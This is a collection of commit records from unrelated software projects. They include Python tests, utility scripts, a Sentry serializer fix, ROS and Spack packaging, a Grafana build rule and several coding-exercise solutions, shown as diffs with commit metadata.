@@ -0,0 +1,2671 @@ +#!/usr/bin/env python2.5%0A#%0A# Copyright 2011 the Melange authors.%0A#%0A# Licensed under the Apache License, Version 2.0 (the %22License%22);%0A# you may not use this file except in compliance with the License.%0A# You may obtain a copy of the License at%0A#%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS,%0A# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.%0A# See the License for the specific language governing permissions and%0A# limitations under the License.%0A%0A%22%22%22Tests for proposal view.%0A%22%22%22%0A%0A__authors__ = %5B%0A '%22Sverre Rabbelier%22 %[email protected]%3E',%0A %5D%0A%0A%0Aimport httplib%0A%0Afrom tests.profile_utils import GSoCProfileHelper%0Afrom tests.test_utils import DjangoTestCase%0Afrom tests.timeline_utils import TimelineHelper%0A%0A# TODO: perhaps we should move this out?%0Afrom soc.modules.gsoc.models.proposal import GSoCProposal%0Afrom soc.modules.seeder.logic.seeder import logic as seeder_logic%0A%0A%0Aclass ProposalTest(DjangoTestCase):%0A %22%22%22Tests proposal page.%0A %22%22%22%0A%0A def setUp(self):%0A from soc.modules.gsoc.models.program import GSoCProgram%0A from soc.modules.gsoc.models.organization import GSoCOrganization%0A properties = %7B'status': 'visible', 'apps_tasks_limit': 20%7D%0A self.gsoc = seeder_logic.seed(GSoCProgram, properties=properties)%0A properties = %7B'scope': self.gsoc, 'status': 'active'%7D%0A self.org = seeder_logic.seed(GSoCOrganization, properties=properties)%0A self.timeline = TimelineHelper(self.gsoc.timeline)%0A self.data = GSoCProfileHelper(self.gsoc)%0A%0A def assertProposalTemplatesUsed(self, response):%0A %22%22%22Asserts that all the templates from the dashboard were used.%0A %22%22%22%0A self.assertGSoCTemplatesUsed(response)%0A self.assertTemplateUsed(response, 'v2/modules/gsoc/proposal/base.html')%0A self.assertTemplateUsed(response, 'v2/modules/gsoc/_form.html')%0A%0A def testSubmitProposal(self):%0A self.data.createStudent()%0A self.timeline.studentSignup()%0A url = '/gsoc/proposal/submit/' + self.org.key().name()%0A response = self.client.get(url)%0A self.assertProposalTemplatesUsed(response)%0A%0A # test POST%0A override = %7B'program': self.gsoc, 'score': 0, 'mentor': None, 'org': self.org, 'status': 'new'%7D%0A properties = seeder_logic.seed_properties(GSoCProposal, properties=override)%0A postdata = properties.copy()%0A postdata%5B'xsrf_token'%5D = self.getXsrfToken(url)%0A response = self.client.post(url, postdata)%0A self.assertResponseRedirect(response)%0A%0A # TODO(SRabbelier): verify%0A proposal = GSoCProposal.all().get()%0A self.assertPropertiesEqual(properties, proposal)%0A
ee4ab0cf3ef08459e1a8ad1cdae370870ba28805
Create lc1755.py
LeetCode/lc1755.py
LeetCode/lc1755.py
Python
0.000001
@@ -0,0 +1,1048 @@ +class Solution:%0A def minAbsDifference(self, nums: List%5Bint%5D, goal: int) -%3E int:%0A n = len(nums)%0A nums.sort(key=lambda x: -abs(x))%0A neg = %5B0 for _ in range(n+1)%5D%0A pos = %5B0 for _ in range(n+1)%5D%0A for i in range(n-1, -1, -1):%0A if nums%5Bi%5D %3C 0:%0A neg%5Bi%5D = neg%5Bi+1%5D + nums%5Bi%5D%0A pos%5Bi%5D = pos%5Bi+1%5D%0A else:%0A pos%5Bi%5D = pos%5Bi+1%5D + nums%5Bi%5D%0A neg%5Bi%5D = neg%5Bi+1%5D%0A # print(nums, pos, neg)%0A ans = abs(goal)%0A s = set(%5B0%5D)%0A def check(a, b):%0A if b %3C goal - ans or goal + ans %3C a:%0A return False%0A return True%0A for i in range(n):%0A s = set(%5Bx for x in s if check(x+neg%5Bi%5D, x+pos%5Bi%5D)%5D)%0A # print(s)%0A t = set()%0A for x in s:%0A y = x + nums%5Bi%5D%0A if abs(y - goal) %3C ans:%0A ans = abs(y - goal)%0A t.add(y)%0A s %7C= t%0A return ans%0A %0A %0A %0A
238d031651cb74d0ca9bed9d38cda836049c9c37
Correct fallback for tag name
src/sentry/api/serializers/models/grouptagkey.py
src/sentry/api/serializers/models/grouptagkey.py
from __future__ import absolute_import from sentry.api.serializers import Serializer, register from sentry.models import GroupTagKey, TagKey @register(GroupTagKey) class GroupTagKeySerializer(Serializer): def get_attrs(self, item_list, user): tag_labels = { t.key: t.get_label() for t in TagKey.objects.filter( project=item_list[0].project, key__in=[i.key for i in item_list] ) } result = {} for item in item_list: try: label = tag_labels[item.key] except KeyError: label = item.value result[item] = { 'name': label, } return result def serialize(self, obj, attrs, user): if obj.key.startswith('sentry:'): key = obj.key.split('sentry:', 1)[-1] else: key = obj.key return { 'name': attrs['name'], 'key': key, 'uniqueValues': obj.values_seen, }
Python
0.000005
@@ -627,26 +627,162 @@ -label = item.value +if item.key.startswith('sentry:'):%0A label = item.key.split('sentry:', 1)%5B-1%5D%0A else:%0A label = item.key %0A
bc3495acdc9f53e2fa7d750f3dd7bb53826326e3
Create csvloader.py
csvloader.py
csvloader.py
Python
0.000053
@@ -0,0 +1,379 @@ +import random%0Aimport csv%0Awith open('points.csv', 'wb') as csvfile:%0A writer = csv.writer(csvfile, delimiter=' ',quotechar='%7C', quoting=csv.QUOTE_MINIMAL)%0A%0A row = %5B%5D%0A for i in range(1000):%0A row.append(random.randrange(-2000,1000))%0A row.append(random.randrange(20,1000))%0A row.append(random.randrange(0,3))%0A writer.writerow(row)%0A row = %5B%5D%0A
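The open(..., 'wb') mode is the Python 2 idiom for csv writers; under Python 3 the file must be opened in text mode with newline=''. A Python 3 variant of the script (an assumption; the commit targets Python 2):

# Python 3 variant: csv writers take a text-mode file opened with
# newline='' instead of the Python 2 'wb' mode.
import csv
import random

with open('points.csv', 'w', newline='') as csvfile:
    writer = csv.writer(csvfile, delimiter=' ', quotechar='|',
                        quoting=csv.QUOTE_MINIMAL)
    for i in range(1000):
        writer.writerow([random.randrange(-2000, 1000),
                         random.randrange(20, 1000),
                         random.randrange(0, 3)])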
8fe27d56592978a0d2a2e43b07214f982bad2010
Add intermediate tower 8
pythonwarrior/towers/intermediate/level_008.py
pythonwarrior/towers/intermediate/level_008.py
Python
0.998595
@@ -0,0 +1,907 @@ +# -------%0A# %7C@ Ss C%3E%7C%0A# -------%0A%0Alevel.description(%22You discover a satchel of bombs which will help %22%0A %22when facing a mob of enemies.%22)%0Alevel.tip(%22Detonate a bomb when you see a couple enemies ahead of %22%0A %22you (warrior.look()). Watch out for your health too.%22)%0Alevel.clue(%22Calling warrior.look() will return an array of Spaces. If the %22%0A %22first two contain enemies, detonate a bomb with %22%0A %22warrior.detonate_().%22)%0Alevel.time_bonus(30)%0Alevel.size(7, 1)%0Alevel.stairs(6, 0)%0A%0Adef add_war_abilities(warrior):%0A warrior.add_abilities('look', 'detonate_')%0A%0Alevel.warrior(0, 0, 'east', func=add_war_abilities)%0A%0Adef add_captive_abilities(unit):%0A unit.add_abilities('explode_')%0A unit.abilities_attr%5B'explode_'%5D.time = 9%0A%0Alevel.unit('captive', 5, 0, 'west', func=add_captive_abilities)%0Alevel.unit('thick_sludge', 2, 0, 'west')%0Alevel.unit('sludge', 3, 0, 'west')%0A
5e9c0961c381dcebe0331c8b0db38794de39300b
Initialize P01_fantasy_game_inventory
books/AutomateTheBoringStuffWithPython/Chapter05/PracticeProjects/P01_fantasy_game_inventory.py
books/AutomateTheBoringStuffWithPython/Chapter05/PracticeProjects/P01_fantasy_game_inventory.py
Python
0.000004
@@ -0,0 +1,1027 @@ +# This program models a player's inventory from a fantasy game%0A# You are creating a fantasy video game. The data structure to model the player%E2%80%99s%0A# inventory will be a dictionary where the keys are string values describing the item%0A# in the inventory and the value is an integer value detailing how many of that item%0A# the player has.%0A#%0A# For example, the dictionary value%0A# %7B'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12%7D%0A# means the player has 1 rope, 6 torches, 42 gold coins, and so on.%0A#%0A# Write a function named displayInventory() that would take any possible %E2%80%9Cinventory%E2%80%9D%0A# and display it like the following:%0A# Inventory:%0A# 12 arrow%0A# 42 gold coin%0A# 1 rope%0A# 6 torch%0A# 1 dagger%0A#%0A# Total number of items: 62%0Astuff = %7B'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12%7D%0A%0Adef displayInventory(inventory):%0A print(%22Inventory:%22)%0A item_total = 0%0A for k, v in inventory.items():%0A # FILL THIS PART IN%0A print(%22Total number of items: %22 + str(item_total))%0A%0AdisplayInventory(stuff)%0A
b50811f87d10dab0768feed293e239ca98a91538
fix issue with ptu server and morse topic by correcting and republishing /ptu/state
topic_republisher/scripts/republish_ptu_state.py
topic_republisher/scripts/republish_ptu_state.py
Python
0
@@ -0,0 +1,1078 @@ +#!/usr/bin/env python%0A%0Aimport rospy%0Afrom sensor_msgs.msg import JointState%0A%0Aclass JointStateRepublisher():%0A%09%22A class to republish joint state information%22%0A%0A%09def __init__(self):%0A%09%09rospy.init_node('ptu_state_republisher')%0A%09%09self.pub = rospy.Publisher('/ptu/state', JointState)%0A rospy.Subscriber(%22/ptu_state%22, JointState, self.callback)%0A%09%09rospy.loginfo(rospy.get_name() + %22 setting up%22)%0A%0A%09def callback(self,data):%0A rospy.logdebug(rospy.get_name() + %22: I heard %25s, %25s%22, data.name, data.position)%0A %0A pan_idx = data.name.index('pan')%0A tilt_idx = data.name.index('tilt')%0A %0A js = JointState()%0A%0A js.header = data.header%0A js.name.append(data.name%5Bpan_idx%5D)%0A js.name.append(data.name%5Btilt_idx%5D)%0A js.position.append(data.position%5Bpan_idx%5D)%0A js.position.append(data.position%5Btilt_idx%5D)%0A%0A self.pub.publish(js)%0A%0Aif __name__ == '__main__':%0A republisher = JointStateRepublisher()%0A rospy.spin()%0A
c4d65e8720b8d79cf19cca6b2f928e3dccd7e888
Convert birthday to DateField
okupy/accounts/models.py
okupy/accounts/models.py
# vim:fileencoding=utf8:et:ts=4:sts=4:sw=4:ft=python from django.conf import settings from django.db import models from ldapdb.models.fields import (CharField, IntegerField, ListField, FloatField, ACLField) import ldapdb.models class Queue(models.Model): username = models.CharField(max_length=100, unique=True) password = models.CharField(max_length=30) first_name = models.CharField(max_length=100) last_name = models.CharField(max_length=100) email = models.EmailField(max_length=254, unique=True) token = models.CharField(max_length=40) class LDAPUser(ldapdb.models.Model): """ Class representing an LDAP user entry """ # LDAP metadata base_dn = settings.AUTH_LDAP_USER_BASE_DN object_classes = settings.AUTH_LDAP_USER_OBJECTCLASS # top object_class = ListField(db_column='objectClass') # person last_name = CharField(db_column='sn') full_name = CharField(db_column='cn') description = CharField(db_column='description') phone = CharField(db_column='telephoneNumber', blank=True) password = ListField(db_column='userPassword') # inetOrgPerson first_name = CharField(db_column='givenName') email = ListField(db_column='mail') username = CharField(db_column='uid', primary_key=True) # posixAccount uid = IntegerField(db_column='uidNumber', unique=True) gid = IntegerField(db_column='gidNumber') gecos = CharField(db_column='gecos') home_directory = CharField(db_column='homeDirectory') login_shell = CharField(db_column='loginShell', default='/bin/bash') # ldapPublicKey ssh_key = ListField(db_column='sshPublicKey') # gentooGroup ACL = ListField(db_column='gentooACL') birthday = CharField(db_column='birthday') gentoo_join_date = ListField(db_column='gentooJoin') gentoo_retire_date = ListField(db_column='gentooRetire') developer_bug = ListField(db_column='gentooDevBug') location = CharField(db_column='gentooLocation') mentor = ListField(db_column='gentooMentor') im = ListField(db_column='gentooIM') gpg_fingerprint = ListField(db_column='gpgfingerprint') gpg_key = ListField(db_column='gpgKey') latitude = FloatField(db_column='lat') longitude = FloatField(db_column='lon') # gentooDevGroup roles = CharField(db_column='gentooRoles') alias = ListField(db_column='gentooAlias') spf = ListField(db_column='gentooSPF') # additional ACL fields based on gentooACL is_user = ACLField(db_column='gentooACL') is_developer = ACLField(db_column='gentooACL') is_foundation = ACLField(db_column='gentooACL') is_staff = ACLField(db_column='gentooACL') is_docs = ACLField(db_column='gentooACL') is_council = ACLField(db_column='gentooACL') is_trustee = ACLField(db_column='gentooACL') is_overlays = ACLField(db_column='gentooACL') is_planet = ACLField(db_column='gentooACL') is_wiki = ACLField(db_column='gentooACL') is_forums = ACLField(db_column='gentooACL') is_security = ACLField(db_column='gentooACL') is_recruiter = ACLField(db_column='gentooACL') is_undertaker = ACLField(db_column='gentooACL') is_pr = ACLField(db_column='gentooACL') is_infra = ACLField(db_column='gentooACL') is_retired = ACLField(db_column='gentooACL') def __str__(self): return self.username def __unicode__(self): return self.username # Models for OpenID data store class OpenID_Nonce(models.Model): server_uri = models.URLField(max_length=2048) ts = models.DateTimeField() salt = models.CharField(max_length=40) class Meta: unique_together = ('server_uri', 'ts', 'salt') class OpenID_Association(models.Model): server_uri = models.URLField(max_length=2048) handle = models.CharField(max_length=255) # TODO: BinaryField in newer versions of django secret = models.CharField(max_length=128) issued = models.DateTimeField() expires = models.DateTimeField() assoc_type = models.CharField(max_length=64) class Meta: unique_together = ('server_uri', 'handle') class OpenID_Attributes(models.Model): """ An attribute choice for submission to the site requesting auth. """ nickname = models.NullBooleanField('Nickname', default=True) email = models.NullBooleanField('E-mail address', default=True) fullname = models.NullBooleanField('Full name', default=True) # XXX: OpenID allows disabling invidual components dob = models.NullBooleanField('Date of birth', default=True) gender = models.NullBooleanField('Gender', default=True) postcode = models.NullBooleanField('Postal code', default=True) country = models.NullBooleanField('Country', default=True) language = models.NullBooleanField('Language', default=True) timezone = models.NullBooleanField('Time zone', default=True)
Python
0.999999
@@ -233,16 +233,27 @@ ACLField +, DateField )%0Aimport @@ -1754,28 +1754,28 @@ birthday = -Char +Date Field(db_col
007b2d2ce61864e87de368e508fa971864847fc7
Create findPrimes.py
findPrimes.py
findPrimes.py
Python
0
@@ -0,0 +1,455 @@ +# Tyler Witt%0A# findPrimes.py%0A# 6.27.14%0A# ver 1.0%0A%0A# This function implements the Sieve of Eratosthenes algorithm to find all the prime numbers below lim%0A%0Adef findPrimes(lim):%0A primes = %5B%5D%0A cur = 0%0A if lim %3C 2:%0A return None%0A for num in range(2, lim + 1):%0A primes.append(num)%0A while (primes%5Bcur%5D ** 2 %3C lim):%0A for val in primes:%0A if val %25 primes%5Bcur%5D == 0 and val != primes%5Bcur%5D:%0A primes.remove(val)%0A cur += 1%0A return (primes)%0A
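The function above removes multiples from a list while iterating over it; the textbook Sieve of Eratosthenes instead marks composites in a boolean table, which avoids mutating the sequence being traversed. A compact sketch with the same interface (None below 2, primes up to and including lim):

# Classic Sieve of Eratosthenes: mark multiples of each prime up to
# sqrt(lim) as composite, then collect the unmarked numbers.
def find_primes(lim):
    if lim < 2:
        return None
    is_prime = [True] * (lim + 1)
    is_prime[0] = is_prime[1] = False
    for p in range(2, int(lim ** 0.5) + 1):
        if is_prime[p]:
            for mult in range(p * p, lim + 1, p):
                is_prime[mult] = False
    return [n for n, prime in enumerate(is_prime) if prime]

assert find_primes(20) == [2, 3, 5, 7, 11, 13, 17, 19]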
80f294e134ef684feb8ac700747a65522edf8758
add new example in the gallery
examples/plot_kraken.py
examples/plot_kraken.py
Python
0
@@ -0,0 +1,1563 @@ +%22%22%22%0AKraken module example%0A=======================%0A%0Akraken module showing distribution of the most frequent taxons%0APlease, see :mod:%60sequana.kraken%60 for more information and the%0Aquality_taxon pipeline module or kraken rule.%0A%22%22%22%0A#This plots a simple taxonomic representation of the output%0A#of the taxonomic pipeline. A more complete and interactive %0A#representatino using krona is available when using the %0A#quality_taxon pipeline in Sequana.%0A%0A%0A##############################################%0A# test %0Afrom sequana import KrakenContaminant%0Ak = KrakenContaminant(%22kraken.out%22, verbose=False)%0Ak.plot(kind='pie')%0A%0A%0A####################################################%0A# The input file **kraken.out** is the output of the %0A# Kraken tool. It is a ste of rows such as those ones::%0A#%0A# C HISEQ:426:C5T65ACXX:5:2301:5633:7203 11234 203 0:2 11234:1 0:1 11234:1 0:2 11234:1 0:13 11234:1 0:1 11234:1 0:3 11234:1 0:16 11234:1 0:5 11234:1 0:6 11234:1 0:13 A:31 0:33 11234:1 0:29 11234:1 0:7%0A# C HISEQ:426:C5T65ACXX:5:2301:5815:7120 11234 203 0:4 11234:1 0:12 11234:1 0:22 11234:1 0:1 0 11234:1 0:5 11234:1 0:7 11234:1 0:5 A:31 0:3 11234:1 0:22 11234:1 0:18 11234:1 0:24 11234:1%0A#%0A#%0A# The KrakenContaminant class will read the file, download a taxonomic database%0A# from EBI, map the taxon found in the **kraken.out** file and figure out the%0A# lineage. In the example above, only the scientific name is found. In the%0A# snakefile provided in Sequana, the full pipeline produces a full lineage%0A# representation using krona tool.%0A#%0A# .. seealso:: :ref:%60pipelines%60%0A%0A
341ca75484b4607eb632d52bf257c8190ebf8a3b
Create fishspine3.py
fishspine3.py
fishspine3.py
Python
0.000005
@@ -0,0 +1,30 @@ +#Fish vertebral location code%0A
11f1079598d446607f11fb3bff9ee41b2c852ac0
Update sync queue time estimation
stats_cron.py
stats_cron.py
from tapiriik.database import db, close_connections from datetime import datetime, timedelta # total distance synced distanceSyncedAggr = db.sync_stats.aggregate([{"$group": {"_id": None, "total": {"$sum": "$Distance"}}}])["result"] if distanceSyncedAggr: distanceSynced = distanceSyncedAggr[0]["total"] else: distanceSynced = 0 # last 24hr, for rate calculation lastDayDistanceSyncedAggr = db.sync_stats.aggregate([{"$match": {"Timestamp": {"$gt": datetime.utcnow() - timedelta(hours=24)}}}, {"$group": {"_id": None, "total": {"$sum": "$Distance"}}}])["result"] if lastDayDistanceSyncedAggr: lastDayDistanceSynced = lastDayDistanceSyncedAggr[0]["total"] else: lastDayDistanceSynced = 0 # similarly, last 1hr lastHourDistanceSyncedAggr = db.sync_stats.aggregate([{"$match": {"Timestamp": {"$gt": datetime.utcnow() - timedelta(hours=1)}}}, {"$group": {"_id": None, "total": {"$sum": "$Distance"}}}])["result"] if lastHourDistanceSyncedAggr: lastHourDistanceSynced = lastHourDistanceSyncedAggr[0]["total"] else: lastHourDistanceSynced = 0 # sync wait time, to save making 1 query/sec-user-browser queueHead = list(db.users.find({"NextSynchronization": {"$lte": datetime.utcnow()}, "SynchronizationWorker": None, "SynchronizationHostRestriction": {"$exists": False}}, {"NextSynchronization": 1}).sort("NextSynchronization").limit(10)) queueHeadTime = timedelta(0) if len(queueHead): for queuedUser in queueHead: queueHeadTime += datetime.utcnow() - queuedUser["NextSynchronization"] queueHeadTime /= len(queueHead) # sync time utilization db.sync_worker_stats.remove({"Timestamp": {"$lt": datetime.utcnow() - timedelta(hours=1)}}) # clean up old records timeUsedAgg = db.sync_worker_stats.aggregate([{"$group": {"_id": None, "total": {"$sum": "$TimeTaken"}}}])["result"] totalSyncOps = db.sync_worker_stats.count() if timeUsedAgg: timeUsed = timeUsedAgg[0]["total"] avgSyncTime = timeUsed / totalSyncOps else: timeUsed = 0 avgSyncTime = 0 # error/pending/locked stats lockedSyncRecords = db.users.aggregate([ {"$match": {"SynchronizationWorker": {"$ne": None}}}, {"$group": {"_id": None, "count": {"$sum": 1}}} ]) if len(lockedSyncRecords["result"]) > 0: lockedSyncRecords = lockedSyncRecords["result"][0]["count"] else: lockedSyncRecords = 0 pendingSynchronizations = db.users.aggregate([ {"$match": {"NextSynchronization": {"$lt": datetime.utcnow()}}}, {"$group": {"_id": None, "count": {"$sum": 1}}} ]) if len(pendingSynchronizations["result"]) > 0: pendingSynchronizations = pendingSynchronizations["result"][0]["count"] else: pendingSynchronizations = 0 usersWithErrors = db.users.aggregate([ {"$match": {"NonblockingSyncErrorCount": {"$gt": 0}}}, {"$group": {"_id": None, "count": {"$sum": 1}}} ]) if len(usersWithErrors["result"]) > 0: usersWithErrors = usersWithErrors["result"][0]["count"] else: usersWithErrors = 0 totalErrors = db.users.aggregate([ {"$group": {"_id": None, "total": {"$sum": "$NonblockingSyncErrorCount"}}} ]) if len(totalErrors["result"]) > 0: totalErrors = totalErrors["result"][0]["total"] else: totalErrors = 0 db.sync_status_stats.insert({ "Timestamp": datetime.utcnow(), "Locked": lockedSyncRecords, "Pending": pendingSynchronizations, "ErrorUsers": usersWithErrors, "TotalErrors": totalErrors, "SyncTimeUsed": timeUsed, "SyncQueueHeadTime": queueHeadTime.total_seconds() }) db.stats.update({}, {"$set": {"TotalDistanceSynced": distanceSynced, "LastDayDistanceSynced": lastDayDistanceSynced, "LastHourDistanceSynced": lastHourDistanceSynced, "TotalSyncTimeUsed": timeUsed, "AverageSyncDuration": avgSyncTime, "LastHourSynchronizationCount": totalSyncOps, "QueueHeadTime": queueHeadTime.total_seconds(), "Updated": datetime.utcnow()}}, upsert=True) def aggregateCommonErrors(): from bson.code import Code # The exception message always appears right before "LOCALS:" map_operation = Code( "function(){" "var errorMatch = new RegExp(/\\n([^\\n]+)\\n\\nLOCALS:/);" "if (!this.SyncErrors) return;" "var id = this._id;" "var svc = this.Service;" "this.SyncErrors.forEach(function(error){" "var message = error.Message.match(errorMatch)[1];" "var key = {service: svc, stem: message.substring(0, 60)};" "emit(key, {count:1, connections:[id], exemplar:message});" "});" "}" ) reduce_operation = Code( "function(key, item){" "var reduced = {count:0, connections:[]};" "var connection_collections = [];" "item.forEach(function(error){" "reduced.count+=error.count;" "reduced.exemplar = error.exemplar;" "connection_collections.push(error.connections);" "});" "reduced.connections = reduced.connections.concat.apply(reduced.connections, connection_collections);" "return reduced;" "}") db.connections.map_reduce(map_operation, reduce_operation, "common_sync_errors") #, finalize=finalize_operation # We don't need to do anything with the result right now, just leave it there to appear in the dashboard aggregateCommonErrors() close_connections()
Python
0
@@ -1,12 +1,16 @@ + from tapirii @@ -1176,35 +1176,24 @@ .find(%7B%22 -NextSynchronization +QueuedAt %22: %7B%22$lt @@ -1308,59 +1308,37 @@ , %7B%22 -NextSynchronization%22: 1%7D).sort(%22NextSynchronization +QueuedAt%22: 1%7D).sort(%22QueuedAt %22).l @@ -1489,35 +1489,24 @@ edUser%5B%22 -NextSynchronization +QueuedAt %22%5D%0D%0A
653ab8128de3c08b6b8be0d662f12ef5a3edf6b2
Add grafana build rule
shipyard/rules/third-party/grafana/build.py
shipyard/rules/third-party/grafana/build.py
Python
0.000001
@@ -0,0 +1,1581 @@ +from foreman import get_relpath, rule%0A%0Afrom garage import scripts%0A%0Afrom templates.common import define_distro_packages%0A%0A%0AGRAFANA_DEB = 'grafana_5.1.4_amd64.deb'%0AGRAFANA_DEB_URI = 'https://s3-us-west-2.amazonaws.com/grafana-releases/release/grafana_5.1.4_amd64.deb'%0AGRAFANA_DEB_CHECKSUM = 'sha256-bbec4cf6112c4c2654b679ae808aaad3b3e4ba39818a6d01f5f19e78946b734e'%0A%0A%0Adefine_distro_packages(%5B%0A 'adduser',%0A 'libfontconfig',%0A%5D)%0A%0A%0A@rule%[email protected]('//base:build')%[email protected]('install_packages')%0Adef build(parameters):%0A drydock_src = parameters%5B'//base:drydock'%5D / get_relpath()%0A scripts.mkdir(drydock_src)%0A with scripts.directory(drydock_src):%0A deb_path = drydock_src / GRAFANA_DEB%0A if not deb_path.exists():%0A scripts.wget(GRAFANA_DEB_URI, deb_path)%0A scripts.ensure_checksum(deb_path, GRAFANA_DEB_CHECKSUM)%0A with scripts.using_sudo():%0A scripts.execute(%5B'dpkg', '--install', deb_path%5D)%0A%0A%0A@rule%[email protected]('build')%[email protected]_depend('//base:tapeout')%0Adef tapeout(parameters):%0A with scripts.using_sudo():%0A rootfs = parameters%5B'//base:drydock/rootfs'%5D%0A scripts.rsync(%0A %5B%0A '/usr/sbin/grafana-server',%0A '/usr/share/grafana',%0A %5D,%0A rootfs,%0A relative=True,%0A )%0A%0A%0A@rule%[email protected]('//base:tapeout')%0Adef trim_usr(parameters):%0A rootfs = parameters%5B'//base:drydock/rootfs'%5D%0A with scripts.using_sudo():%0A scripts.rm(rootfs / 'usr/lib', recursive=True)%0A scripts.rm(rootfs / 'usr/local/lib', recursive=True)%0A
4dd0b349f971cd5ba4842f79a7dba36bf4999b6f
Add Jmol package (#3041)
var/spack/repos/builtin/packages/jmol/package.py
var/spack/repos/builtin/packages/jmol/package.py
Python
0
@@ -0,0 +1,1959 @@ +##############################################################################%0A# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.%0A# Produced at the Lawrence Livermore National Laboratory.%0A#%0A# This file is part of Spack.%0A# Created by Todd Gamblin, [email protected], All rights reserved.%0A# LLNL-CODE-647188%0A#%0A# For details, see https://github.com/llnl/spack%0A# Please also see the LICENSE file for our notice and the LGPL.%0A#%0A# This program is free software; you can redistribute it and/or modify%0A# it under the terms of the GNU Lesser General Public License (as%0A# published by the Free Software Foundation) version 2.1, February 1999.%0A#%0A# This program is distributed in the hope that it will be useful, but%0A# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF%0A# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and%0A# conditions of the GNU Lesser General Public License for more details.%0A#%0A# You should have received a copy of the GNU Lesser General Public%0A# License along with this program; if not, write to the Free Software%0A# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA%0A##############################################################################%0Afrom spack import *%0Afrom distutils.dir_util import copy_tree%0A%0A%0Aclass Jmol(Package):%0A %22%22%22Jmol: an open-source Java viewer for chemical structures in 3D%0A with features for chemicals, crystals, materials and biomolecules.%22%22%22%0A%0A homepage = %22http://jmol.sourceforge.net/%22%0A url = %22https://sourceforge.net/projects/jmol/files/Jmol/Version%252014.8/Jmol%252014.8.0/Jmol-14.8.0-binary.tar.gz%22%0A%0A version('14.8.0', '3c9f4004b9e617ea3ea0b78ab32397ea')%0A%0A depends_on('jdk', type='run')%0A%0A def install(self, spec, prefix):%0A copy_tree('jmol-%7B0%7D'.format(self.version), prefix)%0A%0A def setup_environment(self, spack_env, run_env):%0A run_env.prepend_path('PATH', self.prefix)%0A run_env.set('JMOL_HOME', self.prefix)%0A
dc635babcf78343bf9490a77d716db89bda2698b
Create __init__.py
api_1_0/__init__.py
api_1_0/__init__.py
Python
0.000429
@@ -0,0 +1,125 @@ +from flask import Blueprint %0A%0Aapi = Blueprint('api', __name__)%0A%0Afrom . import authentication, posts, users, comments, errors%0A
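A blueprint only takes effect once registered on an application. A typical registration sketch (the factory name and URL prefix here are assumptions, not from the commit):

# Hypothetical registration of the api blueprint in an app factory.
from flask import Flask

def create_app():
    app = Flask(__name__)
    from api_1_0 import api
    app.register_blueprint(api, url_prefix='/api/v1.0')
    return app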
7d29c44e19c1f06deb0722a3df51501b39566c4b
Implement simple encoding/decoding command-line tool
flynn/tool.py
flynn/tool.py
Python
0.000108
@@ -0,0 +1,1282 @@ +# coding: utf-8%0A%0Aimport sys%0Aimport argparse%0A%0Aimport flynn%0Aimport json%0A%0Adef main(args=sys.argv%5B1:%5D):%0A%09formats = %7B%22json%22, %22cbor%22, %22cbori%22, %22cborh%22, %22cborhi%22%7D%0A%09argparser = argparse.ArgumentParser()%0A%09argparser.add_argument(%22-i%22, %22--input-format%22, choices=formats, default=%22cbor%22)%0A%09argparser.add_argument(%22-o%22, %22--output-format%22, choices=formats, default=%22cbor%22)%0A%09args = argparser.parse_args(args)%0A%09if args.input_format in %7B%22cbor%22, %22cbori%22%7D:%0A%09%09input_format = %22cbor%22%0A%09else:%0A%09%09input_format = args.input_format%0A%09output_format = args.output_format%0A%0A%09intermediate = None%0A%09if input_format in %7B%22cbor%22, %22cbori%22%7D:%0A%09%09intermediate = flynn.load(sys.stdin.raw)%0A%09elif input_format in %7B%22cborh%22, %22cborhi%22%7D:%0A%09%09intermediate = flynn.loadh(sys.stdin.read())%0A%09elif input_format == %22json%22:%0A%09%09intermediate = json.load(sys.stdin)%0A%0A%09if output_format == %22cbor%22:%0A%09%09flynn.dump(intermediate, sys.stdout.raw)%0A%09elif output_format == %22cbori%22:%0A%09%09flynn.dump(intermediate, sys.stdout.raw, cls=flynn.encoder.InfiniteEncoder)%0A%09elif output_format == %22cborh%22:%0A%09%09sys.stdout.write(flynn.dumph(intermediate))%0A%09elif output_format == %22cborhi%22:%0A%09%09sys.stdout.write(flynn.dumph(intermediate, cls=flynn.encoder.InfiniteEncoder))%0A%09elif output_format == %22json%22:%0A%09%09json.dump(intermediate, sys.stdout)%0A%0Aif __name__ == %22__main__%22:%0A%09main()%0A%0A
5af92f3905f2d0101eeb42ae7cc51bff528ea6ea
Write bodies given by coordinates to a VTK file
syngeo/io.py
syngeo/io.py
Python
0.000001
@@ -0,0 +1,846 @@ +# stardard library%0Aimport sys, os%0A%0A# external libraries%0Aimport numpy as np%0Afrom ray import imio, evaluate%0A%0Adef add_anything(a, b):%0A return a + b%0A%0Adef write_synapse_to_vtk(neurons, coords, fn, im=None, t=(2,0,1), s=(1,-1,1),%0A margin=None):%0A %22%22%22Output neuron shapes around pre- and post-synapse coordinates.%0A %0A The coordinate array is a (n+1) x m array, where n is the number of %0A post-synaptic sites (fly neurons are polyadic) and m = neurons.ndim, the%0A number of dimensions of the image.%0A %22%22%22%0A neuron_ids = neurons%5Bzip(*(coords%5B:,t%5D*s))%5D%0A synapse_volume = reduce(add_anything, %0A %5B(i+1)*(neurons==j) for i, j in enumerate(neuron_ids)%5D)%0A imio.write_vtk(synapse_volume, fn)%0A if im is not None:%0A imio.write_vtk(im, %0A os.path.join(os.path.dirname(fn), 'image.' + os.path.basename(fn)))%0A
e6e90cef36551796f7fb06585c67508538ce113f
Create MaxCounters.py
Counting-Elements/MaxCounters.py
Counting-Elements/MaxCounters.py
Python
0
@@ -0,0 +1,407 @@ +# https://codility.com/demo/results/trainingTC7JSX-8E9/%0Adef solution(N, A):%0A counters = N * %5B0%5D%0A max_counters = 0%0A for elem in A:%0A if elem == N+1:%0A counters = N * %5Bmax_counters%5D%0A else:%0A this_elem = counters%5Belem-1%5D + 1%0A counters%5Belem-1%5D = this_elem%0A if this_elem %3E max_counters:%0A max_counters = this_elem%0A return counters%0A
